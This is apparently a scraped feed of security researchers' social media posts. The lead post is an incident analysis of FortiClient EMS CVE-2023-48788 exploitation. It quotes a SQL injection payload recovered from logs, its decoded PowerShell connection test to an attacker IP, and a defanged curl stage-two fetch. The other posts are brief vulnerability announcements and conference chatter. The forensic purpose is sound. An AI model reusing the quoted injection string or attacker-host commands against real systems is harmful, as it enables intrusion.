My team colleague @hackerkartellet investigated an intrusion this week that started via CVE-2023-48788: A vulnerability in the Fortinet FortiClient EMS application that allows unauthenticated users the ability to execute commands (under SYSTEM rights) via specially crafted messages, as detailed by @Horizon3Attack [1]
A prerequisite for the exploit is that the EMS port 8013 (TCP) is accessible from the Internet, which was the case in our investigation.
Horizona3 published its proof-of-concept code on March 20, 2024. [2]
The Metasploit module followed on April 12, 2024 [3].
But only this week did the customer notice the vulnerable application because an EDR produced an alert (sqlservr.exe -> cmd.exe -> powershell.exe). As mentioned multiple times, perimeter protection is critical, including regular perimeter scanning for vulnerabilities. A dedicated vulnerability scanner would have found this vulnerability, and the patch could have been applied in time.
There are some forensic nuggets in this case: The fcmdaemon logs are stored in the C:\Program Files (x86)\Fortinet\FortiClientEMS\logs\ directory, for example: fcmdaemon[2024-05-15 04-39-09].log
If we take a look at the Metasploit module, we can see that the payload is concatenated here: CONVERT(VARCHAR(MAX), 0X#{payload.encoded.unpack('H*').first});
When we search for the keyword VARCHAR within the logs, we actually see references to exactly this Metasploit module:
OR 1=1; DECLARE @SQL VARCHAR(118) = CONVERT(VARCHAR(MAX), 0X706F7765727368656C6C2E65786520746573742D6E6574636F6E6E656374696F6E203138352E3231362E37302E313730202D706F72742031333337);
Which, when we decode it back from hex, is the initial connection test:
powershell.exe test-netconnection 185.216.70.170 -port 1337
Followed by the next stage of the exploit chain:
curl hXXp://185.216.70.170:1337
Apache HTTP Server just fixed 7 of my vulnerabilities! I'll be covering 5 of them in my Black Hat USA #BHUSA talk next month! (Still no hope for the VISA, tho 🤷♂️) Anyway, stay tuned! 🔥
> https://t.co/RrqsqGdZPl
Huge thanks to @RVAsec for an incredible conference! It was fantastic connecting with so many awesome people! The vibes were incredible and the custom lager was even better! Looking forward to next year!
Thrilled to have presented with @noperator at #RVASec! So excited to share our research at @bishopfox on LLMs as assistants, not replacements, in identifying vulnerable functions in patch diffs!
I reported a couple of 0days to Ivanti. The main product affected is Connect Secure SSL-VPN solution (formerly known as Pulse Connect Secure). The vendor registered CVE-2022-35254 and CVE-2022-35258 and released a security bullettin on 13 October 2022 (https://t.co/GN42CdSUbe).
We are currently investigating CVE-2022-42889, a vulnerability in Apache Commons Text versions 1.5 through 1.9 which can allow RCE when applied to untrusted input due to insecure interpolation defaults.
Giveaway time! To celebrate 80k followers!
We are going to give a 1-month voucher to **80** people who RT this tweet (picked randomly)!
We are going to send our socks, t-shirt and few goodies to one person who follows @PentesterLab and likes this tweet (picked randomly)!!
Not much concrete info on the vulns themselves at this point, but looks like another bad day for Microsoft Exchange. Notably, these look to be *post*-auth, which would be helpful. Credit to GTSC. https://t.co/JUTJOe6DuE
🚨 WARNING 🚨
Another day, another 0day exploited in the wild, this time for Exchange.
https://t.co/Tyqv56b7Ut
If you have on-prem Exchange port 443 exposed, assume breach. There's no patch, so mitigate in place and search for IOC's. Then... start the migration project.